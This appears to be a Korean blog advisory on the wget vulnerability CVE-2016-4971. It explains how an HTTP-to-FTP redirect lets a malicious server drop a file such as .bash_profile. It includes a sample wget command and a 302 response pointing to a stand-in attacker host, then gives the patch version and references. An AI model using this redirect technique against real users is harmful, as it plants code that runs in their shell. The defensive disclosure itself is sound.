Wget취약점(CVE-2016-4971) 발견!
최근 CVE-2016-4971취약점이 발견되었습니다. 이 취약점은 모든 wget에 존재하는 취약점으로, 공격자는 해당 취약점을 이용하여 프로그래머나 유지보수 관리자에게 피싱공격을 통하여 root권한을 탈취하거나 rootkit을 심을 수 있습니다.
원리
wget은 *nix시스템에서 자주 사용하는 다운로드 툴로 http, https, ftp등 다양한 프로토콜을 지원합니다. wget을 사용하여 파일을 내려받을 때 HTTP 서버에서 FTP서버로 리다이렉션 된다면, wget은 추가적인 인증 없이 http서버, 리다이렉션 되는 URL에 있는 파일이름을 신뢰하는 것으로 판단합니다. 그렇기 때문에, 해커가 악성 파일을 내려보내는 방법을 이용하여 사용자 PC를 공격할 수 있습니다.
예를들어, 우리는 wget http://attackers-server/safe_file.txt을 방문할 때, 만약 http 서버가 다음과 같은 응답헤더를 발송합니다.
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache
wget은 자동으로 리다이렉트 되고, 악성 FTP서버에 있는 악성 .bash_profile을 내려받게 되는것입니다.
취약한 버전
모든 버전의 wget
패치방법
GNU wget 1.18 버전으로 업데이트
참고 :
https://bugzilla.redhat.com/show_bug.cgi?id=1343666
https://lists.gnu.org/archive/html/bug-wget/2016-06/msg00033.html
http://git.savannah.gnu.org/cgit/wget.git/commit/?id=e996e322ffd42aaa051602da182d03178d0f13e1
여러 루팅 익스플로잇 사용하는 안드로이드 악성코드 Godless 발견! (0) | 2016.06.27 |
---|---|
Librachive 취약점 발견! (0) | 2016.06.23 |
전화를 하기 위해 Google Talk을 사용하는 안드로이드 멀웨어 발견 (0) | 2016.06.22 |
Acer온라인 쇼핑몰 고객정보 유출! (0) | 2016.06.21 |
Python urllib HTTP 헤더 인젝션 취약점 (0) | 2016.06.21 |
댓글 영역